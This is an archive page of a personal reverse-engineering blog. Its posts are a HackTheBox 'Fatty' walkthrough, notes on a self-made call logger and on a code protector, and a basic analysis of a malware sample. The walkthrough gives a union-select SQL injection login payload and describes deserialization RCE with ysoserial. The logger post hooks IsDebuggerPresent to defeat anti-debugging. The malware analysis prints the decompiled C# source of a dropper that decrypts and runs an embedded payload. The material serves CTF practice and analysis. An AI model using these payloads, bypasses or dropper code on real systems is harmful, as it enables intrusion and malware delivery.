Saturday, August 8, 2020

HackTheBox - Fatty

 Hello guys. Today we will be doing Fatty from HackTheBox

This box is marked as Insane probably due reversing stuff. If you are into reversing then this box is relatively easy one.  

Port scanning

As we do not have any web server and higher ports are not recognized by nmap so lets download all files from as we have anonymous access.

FTP

Now we have username and password which is great. However we know a purpose of the higher ports from nmap scan.

Reversing client

Before we even connect to the server lets reverse the client in jadx-gui.

As we already know port 8000 is not used so we need to redirect traffic to port 1337 and as they use hostname we have to add it to the /etc/hosts and then run socat

Now it is time to download the newest Java 8 and Eclipse for Java 

Run the client and login with: qtc:clarabibi

From FileBrowser functionality we can read some notes about security issues. It would be good if could read files from others directories. In Eclipse install this plugin Enhanced Class Decompiler. Once we have it installed Create a Java Project -> change JRE to 8 -> Next -> Libraries -> Add External JARs -> choose our client and click Finish. There is one more thing to do it: Window -> Preferences -> General -> Editors -> File Associations -> class without source -> choose Class Decompiler Viewer and click Default.

Now put a breakpoint like this

Now we can debug application by clicking Debug As -> Java Application and then choose Starter class. After logging in head over to FileBrowser choose Configs (but it does not matter what you choose) and switch perspective to Debug.

As we change arg as above and hit Resume button then we get this

The file jar is a binary file so we can't read it by open functionality. In Eclipse we do not have any functionality to dump data in debugger to a file. The only workaround is to put conditional breakpoint which gives you ability to execute any code like in our case saving to a file.

Then right click on breakpoint properties

Now open fatty-server.jar and remember to change path to .. and after a while we should have the server.jar. 

There were some rubbish bytes at the beginning of the file and after removing them. We have server.jar which we can load to jadx-gui.

Reversing server


This is very simple SQL Injection. For this we use simple union select injection like this:

' union select 1337, 'pwned', 'pwned@fatty.htb', 'a2b782c00592afd41d63bde32dc48ab0ddc5dbfe8b99a11a2fb55b6bc0d2111a', 'admin

This will be our login payload. Now put breakpoint in htb.fatty.shared.message.LoginMessage at 32 line and debug client. For login put our payload from above and password leave as empty and click Login. Once we hit a breakpoint change variable this -> user -> password to a2b782c00592afd41d63bde32dc48ab0ddc5dbfe8b99a11a2fb55b6bc0d2111a and click Resume.

Now as we are admin we can change password and above code let us RCE due deserialization.

We use ysoserial to get payload. Remove all breakpoint and put breakpoints in htb.fatty.shared.message.ActionMessage at 19 and 37 lines then list files in FileBrowser and change command from files to changePW and args to our payload

And...

We are in docker... and we can't get a proper shell. After looking around there is one interesting file /opt/fatty/tar/logs.tar so we can make assumption that host downloads this log file.

And we are root! Fun and great box. Hope you guys enjoy it and learnt something new.

Sunday, November 9, 2014

SCL 0.2

Hello.

I'd like to announce I made a new version of Simple Call Logger. In the new version I decided to remove a script file and now everything can be done with dll. Application now provides more API functions, can be used in system when ASLR is on and beside logging mode now also has running mode.

Usage
To run program you need to pass program name to be analyzed by SCL.
SCL app.exe
In the next step you can load a dll file to do various tasks but this step is not necessary. Lets look on API functions:
API DWORD getRegisterValue(DWORD reg);
API void setRegisterValue(DWORD reg, DWORD value);
API DWORD getFlagValue(DWORD flag);
API void setFlagValue(DWORD flag, DWORD value);
API BOOL getMemoryValueVA(DWORD address, DWORD *out, DWORD *error);
API BOOL setMemoryValueVA(DWORD address, DWORD value, DWORD *error);
API BOOL getMemoryValueRVA(DWORD address, DWORD *out, DWORD *error);
API BOOL setMemoryValueRVA(DWORD address, DWORD value, DWORD *error);
API BOOL getBufferVA(DWORD address, BYTE *buffer, DWORD size, DWORD *error);
API BOOL setBufferVA(DWORD address, BYTE *buffer, DWORD size, DWORD *error);
API BOOL getBufferRVA(DWORD address, BYTE *buffer, DWORD size, DWORD *error);
API BOOL setBufferRVA(DWORD address, BYTE *buffer, DWORD size, DWORD *error);
API BOOL allocateBuffer(BYTE *buffer, DWORD size, DWORD *address, DWORD *error);
API BOOL freeBuffer(DWORD address, DWORD *error);
API BOOL getArgument(DWORD numberOfArgument, DWORD *out, DWORD *error);
API BOOL setArgument(DWORD numberOfArgument, DWORD value, DWORD *error);
API void saveToLogFile(const char * format, ...);
API DWORD getFunctionAddress(char *name);
API void setCallbackOnNewDllEvent(void (*callback)(const char *name));
API void setCallbackAtEipVA(void (*callback)(), DWORD address);
API void setCallbackAfterCallVA(void (*callback)(), DWORD address);
API void setCallbackAtEipRVA(void (*callback)(), DWORD address);
API void setCallbackAfterCallRVA(void (*callback)(), DWORD address);
Now I'll show you how you can use these functions. In normal case you will probably have an application without source file so you should look on application behavior. For example a log file may contain something like this:
Name: C:\app.exe processID: 0x99E0 threadID: 0x99E4
Call to: 0x7C813123 (C:\WINDOWS\system32\kernel32.dll:IsDebuggerPresent) EIP: 0x00401024
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Name: C:\app.exe processID: 0x99E0 threadID: 0x99E4
Call from 0x00401024 to 0x7C813123 (C:\WINDOWS\system32\kernel32.dll:IsDebuggerPresent) EIP: 0x0040102A
Stack values: 0x78B53714 0x0012FFC0 0x0040122C 0x00000001 0x00382A48 0x00383208 0x68FBC5A4 0x00000000 0x00007603 0x7FFDB000 
Registers before call:
EAX: 0x00383208 EBX: 0x00000000 ECX: 0x78B53714 EDX: 0x00000000 EBP: 0x0012FF7C ESP: 0x0012FF78 ESI: 0x00000001 EDI: 0x00403378 EFLAGS: 0x00000246 FLAGS: CF: 0 PF: 1 AF: 0 ZF: 1 SF: 0 DF: 0 OF: 0
Registers after call:
EAX: 0x00000001 EBX: 0x00000000 ECX: 0x78B53714 EDX: 0x00000000 EBP: 0x0012FF7C ESP: 0x0012FF78 ESI: 0x00000001 EDI: 0x00403378 EFLAGS: 0x00000246 FLAGS: CF: 0 PF: 1 AF: 0 ZF: 1 SF: 0 DF: 0 OF: 0
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Name: C:\app.exe processID: 0x99E0 threadID: 0x99E4
Conditional jump (je) to: 0x00401038 is NOT taken EIP: 0x0040102C EFLAGS: 0x00000202 FLAGS: CF: 0 PF: 0 AF: 0 ZF: 0 SF: 0 DF: 0 OF: 0
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Name: C:\app.exe processID: 0x99E0 threadID: 0x99E4
Jump to: 0x004010BB EIP: 0x00401033
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Name: C:\app.exe processID: 0x99E0 threadID: 0x99E4
Call from 0x00401227 to 0x00401020 EIP: 0x0040122C
Stack values: 0x00000001 0x00382A48 0x00383208 0x68FBC5A4 0x00000000 0x00007603 0x7FFDB000 0x00007603 0x00000000 0x0012FF90 
Registers before call:
EAX: 0x00383208 EBX: 0x00000000 ECX: 0x78B53714 EDX: 0x00000000 EBP: 0x0012FFC0 ESP: 0x0012FF84 ESI: 0x00000001 EDI: 0x00403378 EFLAGS: 0x00000246 FLAGS: CF: 0 PF: 1 AF: 0 ZF: 1 SF: 0 DF: 0 OF: 0
Registers after call:
EAX: 0x00000001 EBX: 0x00000000 ECX: 0x78B53714 EDX: 0x00000000 EBP: 0x0012FFC0 ESP: 0x0012FF84 ESI: 0x00000001 EDI: 0x00403378 EFLAGS: 0x00000202 FLAGS: CF: 0 PF: 0 AF: 0 ZF: 0 SF: 0 DF: 0 OF: 0
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Name: C:\app.exe processID: 0x99E0 threadID: 0x99E4
Conditional jump (jne) to: 0x00401273 is NOT taken EIP: 0x0040123A EFLAGS: 0x00000246 FLAGS: CF: 0 PF: 1 AF: 0 ZF: 1 SF: 0 DF: 0 OF: 0
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Name: C:\app.exe processID: 0x99E0 threadID: 0x99E4
Call to: 0x78AC8040 (C:\WINDOWS\system32\msvcr100.dll:exit) EIP: 0x0040123D
And we know that at address 0x0040102C we should jump so the best solution to do this is use setCallbackAfterCallVA function and in our callback function use setRegisterValue function to set register EAX to 0. Ok now lets make a dll file. The most interesting fragment may look:
void myIsDebuggerPresent()
{
 setRegisterValue(REGISTER_EAX, 0);
}

void newDll(const char *name)
{
 DWORD addr = getFunctionAddress("IsDebuggerPresent");
 if(addr)
 {
  setCallbackAfterCallVA(myIsDebuggerPresent, addr);
 }
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved )
{
 if(fdwReason == DLL_PROCESS_ATTACH)
 {
  setCallbackOnNewDllEvent(newDll);
 }
    return TRUE; 
}
DllMain register callback on dll event. When dll is loaded to an application, SCL will call our callback and also pass full path of dll like: C:\WINDOWS\system32\kernel32.dll and what we need to do is get function address of IsDebuggerPresent and then set on this address callback to our myIsDebuggerPresent function.

When you load an application into SCL the default state is logging but if you want to interact with an application press Escape key to change to running mode if you wanna go back to logging mode press again Escape key and that's all.

Download: link 32 bit version (included example application and dll)

Till next time.

Sunday, October 19, 2014

Simple Call Logger

Hello everyone.

I've just made a new version of my call logger. I added new features:
-logging all tls callbacks
-logging all dll main
-new script system

I added logging all tls callbacks and dll main because program works as a single stepping debugger and now debugger checks in tls callbacks and dll main can be bypassed.

Scripting
Now script file looks:
#this is one line comment
file=hook.dll # dll which will be loaded
eip=0x12345678;functionName;
beforedll=VirtualQuery;functionName;
afterdll=VirtualQuery;functionName;
beforecall=0x12345678;functionName;
aftercall=0x12345678;functionName;
When call logger reach a given EIP, before call to a given function or after call to a given function then call logger will call to a function functionName. Now call logger provides thirteen functions which can be used to do some action like: get or set register value, get or set memory value and so on. Example script file and dll will be provided with application.

You can download here 32 bit version

Till next time.

Saturday, September 27, 2014

STM32F4

Hi.

Today I'd like to show you two videos.

The first one shows video player from SD card:

The second video shows generating VGA signal:

Enjoy watching.

Friday, September 26, 2014

Simple call logger

Hello.

I'm working on a new application which can be used to log application behavior. By saying behavior I mean logging events for example: creating a new thread, loading a dll, calling API functions or application functions and jumping. That's not all features. Call logger enables to do specific action for example: starting logging application from a given address, changing register value, changing memory value, saving parameter or buffer, changing parameter or buffer. These actions can be used only at given EIP, before/after call to a function, before/after call to a dll function. A script file may look:
start=0x004016fe;
afterdll=IsDebuggerPresent;register=eax,0x00000000;
After call to IsDebuggerPresent register eax is set to 0. This command is useful because logger works as debugger and application won't know that is being debugged. And example log file may look:
Start from: 0x004016FE
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
LoadDLL: ntdll.dll
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
LoadDLL: KERNEL32.dll
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
LoadDLL: msvcrt.dll
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Name: test.exe processID: 7BE8 threadID: 7BEC
Jump to: 0x7C813123 (KERNEL32.dll:IsDebuggerPresent) EIP: 0x00403808
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Name: test.exe processID: 7BE8 threadID: 7BEC
Jump from 0x00403808 to 0x7C813123 (KERNEL32.dll:IsDebuggerPresent) EIP: 0x00401750
Stack params: 0x00000000 0x00000000 0x004016BD 0x00000000 0x00000000 0x00000000 0x0022FFA0 0x00401CFE 0x00401CA0 0x0022FF30 
Registers before call:
EAX: 0x0000002C EBX: 0x00000000 ECX: 0x7C810693 EDX: 0xFFFFFFFF EBP: 0x0022FF18 ESP: 0x0022FEEC ESI: 0x00241EE9 EDI: 0x0022FF33 EFLAGS: 0x00000206
Registers after call:
EAX: 0x00000000 EBX: 0x00000000 ECX: 0x7C810693 EDX: 0xFFFFFFFF EBP: 0x0022FF18 ESP: 0x0022FEF0 ESI: 0x00241EE9 EDI: 0x0022FF33 EFLAGS: 0x00000206 CF: 0 PF: 1 AF: 0 ZF: 0 SF: 0 DF: 0 OF: 0
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Name: test.exe processID: 7BE8 threadID: 7BEC
CONDITIONAL JMP (JZ) is TAKEN to: 0x0040175E EIP: 0x00401752 CF: 0 PF: 1 AF: 0 ZF: 1 SF: 0 DF: 0 OF: 0
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Name: test.exe processID: 7BE8 threadID: 7BEC
Call to: 0x00403738 EIP: 0x00401762
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
It's not all file but it shows how it works. So till next time.

Sunday, September 14, 2014

My simple protector

Hi.
I'd like to show you my simple protector for C applications. For now it's only for C applications, because my protector parses C code to get code with encoded strings and hidden API calls. Then code is compiled and the last step is to pack all functions from source file. Every function is packed in another way. Function is decoded before every calling, because it's not decoded in code segment. Packed function is copied to a new region in memory and there is decoded, then code executes and after execution, decoded function is removed from memory. That's all features for now. I made a simple application you can download a zip file included source file and two exe files, first was compiled by mingw, second was protected by my simple protector: Download



Monday, February 24, 2014

Basic analysis

Hi.

Today we're going to do a basic analysis on a some virus. In the last note I mentioned you have two ways to analyze viruses, malwares etc:
  • basic analysis
  • dynamic analysis
Dynamic analysis is very simple, because you only run suspect file and watch its behavior using variety programs like: Wireshark, RegShot, etc. Today I won't be explaining how to use dynamic analysis though. Ok so let's start. The suspect file is called IMG_PhotoView_SAM68403(1).scr and this file we load to Exeinfo PE, however you can use PEiD, but I'm using Exeinfo PE and we see this file is written in C# so we can load into .NET Reflector and we can see code:
internal class Program
{
    // Fields
    private string f;

    // Methods
    private static void Main(string[] args)
    {
        try
        {
            string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
            string str2 = File.ReadAllText(Process.GetCurrentProcess().MainModule.FileName);
            string[] separator = new string[] { "[024578974asf6843sr6g87g67]" };
            string[] strArray2 = str2.Split(separator, StringSplitOptions.None);
            byte[] bytes = UnSecure(Convert.FromBase64String(strArray2[1]));
            File.WriteAllBytes(folderPath + @"\" + strArray2[2], bytes);
            Process.Start(folderPath + @"\" + strArray2[2]);
        }
        catch
        {
        }
    }

    private static byte[] UnSecure(byte[] data)
    {
        RijndaelManaged managed = new RijndaelManaged();
        byte[] buffer = new byte[] { 1, 2, 3, 4, 5, 6, 7, 8, 9, 1, 2, 3, 4, 5, 6, 7 };
        byte[] buffer2 = new byte[] { 7, 6, 5, 4, 3, 2, 1, 9, 8, 7, 6, 5, 4, 3, 2, 1 };
        managed.IV = buffer;
        managed.Key = buffer2;
        return managed.CreateDecryptor().TransformFinalBlock(data, 0, data.Length);
    }
}
Since we already have a code we're also able to copy it, but remember we need to remove a function Process.Start and change path to our suspect file then we can execute our program and we get in my case file is called: lkjyhgtrt.exe which is written in Delphi. So let's load into IDA, but before beginning analysis I recommend to use signatures in IDA. It'll make the analysis simpler and easier. The main goal is to find some functions like: connect to server/ftp/irc, download file, create a new thread etc. Interesting function for us is at address: 0x00493DAC. The function checks a command returned from an attacker server and then executes it. There are a lot of implemented commands for example:
And example function:
And one more thing could be interesting this suspect file contains in its resources a meme, you can use Resource Hacker and see it, but the virus loads this meme and shows it but I don't encourage to run virus only for see this meme :>

Ok that's all. If you have any questions you're welcome to post it in comments.

Link to unpacked file: link